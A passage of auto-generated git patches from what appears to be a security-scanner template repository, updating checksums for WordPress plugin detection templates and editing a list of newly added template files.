+http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f +http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 +http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c -http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d -http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 -http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e -http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 -http/technologies/wordpress/plugins/post-types-order.yaml:ac4e48bb51998b2fb77e25135e3a34ccd1ff5bb3 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 -http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 -http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 -http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 -http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a +http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a +http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa +http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da +http/technologies/wordpress/plugins/post-types-order.yaml:f79cb83aa5e58f0845684ed7d79839a99080bcea +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 +http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf +http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd -http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6587,7 +6588,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:99ae57d2cb29d33671ed3b462e2c2d5cf00814e7 +templates-checksum.txt:9f51ee0fd65558213675767dc833388e1524950d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 2cb6c38d0a49e4f4b09fd673c3aae29e2ce09989 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jul 2023 07:38:55 +0000 Subject: [PATCH 602/609] Auto Generated New Template Addition List [Tue Jul 11 07:38:55 UTC 2023] :robot: --- .new-additions | 1 - 1 file changed, 1 deletion(-) diff --git a/.new-additions b/.new-additions index 23724bf21e..18b22c60fa 100644 --- a/.new-additions +++ b/.new-additions @@ -7,4 +7,3 @@ http/cves/2023/CVE-2023-33440.yaml http/cves/2023/CVE-2023-3479.yaml http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml http/misconfiguration/dlink-config-dump.yaml -http/technologies/sharefile-storage-server.yaml From 625347bb68be4e5ad8dd44b12d6152696b6f2d42 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jul 2023 07:40:00 +0000 Subject: [PATCH 603/609] TemplateMan Update [Tue Jul 11 07:40:00 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cloudflare.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + 